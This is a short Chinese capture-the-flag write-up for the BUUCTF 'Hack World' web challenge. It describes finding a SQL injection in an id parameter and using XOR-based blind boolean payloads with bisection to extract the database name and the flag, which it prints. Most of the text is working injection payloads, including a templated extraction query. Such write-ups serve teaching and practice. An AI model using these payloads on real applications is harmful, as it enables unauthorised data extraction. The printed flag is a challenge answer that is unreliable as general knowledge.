buuctf——[CISCN2019 华北赛区 Day2 Web1]Hack World
1.根据提示,说明flag在表里

2.那就猜测存在sql注入,反手测试一波id=1'

3.尝试使用1'--+进行注释

4.直接丢进salmap里吧,不出意外多半是跑不出来

5.直接放入fuzz里进行测试

6.发现当我们使用异或时,出现了提示
Hello, glzjin wants a girlfriend.

7.那我们就按照这个思路进行注入
异或异或,相同为0,不同为1


8.判断数据库的长度
0^(length(database())>0)

0^(length(database())>16)

9.使用折半查找的方式进行测试

0^(length(database())>13)

0^(length(database())>10)

0^(length(database())>11)

10.说明数据库的长度为11
0^(length(database())=11)

12.判断数据库名
0^(ascii(substr(database(),1,1))>80)

0^(ascii(substr(database(),1,1))>100)

0^(ascii(substr(database(),1,1))>90)

0^(ascii(substr(database(),1,1))>95)

0^(ascii(substr(database(),1,1))>97)

0^(ascii(substr(database(),1,1))>98)

0^(ascii(substr(database(),1,1))>99)

id=0^(ascii(substr(database(),1,1))=99)

中间的折磨了好久想爆破数据库的表名,走啦好多的弯路,可以直接出来的
0^(ascii(substr((select(flag)from(flag)),{},1))>{})

flag{bcc3af9d-a5ee-4395-a540-ffb516eaba15}




















